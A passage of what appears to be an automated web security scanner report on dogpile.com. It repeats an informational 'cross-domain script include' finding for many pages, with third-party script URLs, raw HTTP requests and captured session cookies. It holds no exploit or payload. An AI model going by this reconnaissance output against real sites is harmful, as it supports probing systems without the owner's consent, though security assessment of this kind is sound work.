http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

12.51. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.52. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.53. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.54. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.55. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.56. http://www.dogpile.com/dogpile_other/ws/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=91f95e6548a4490186bdc16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

12.57. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.58. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.59. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.60. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.61. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.62. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.63. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.64. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.65. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.66. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.67. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b178c96e1aba4492b2dac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 51035
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

12.68. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.69. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

12.70. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/termsofuse/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.71. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.72. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/GE+Zero+Taxes

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.73. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
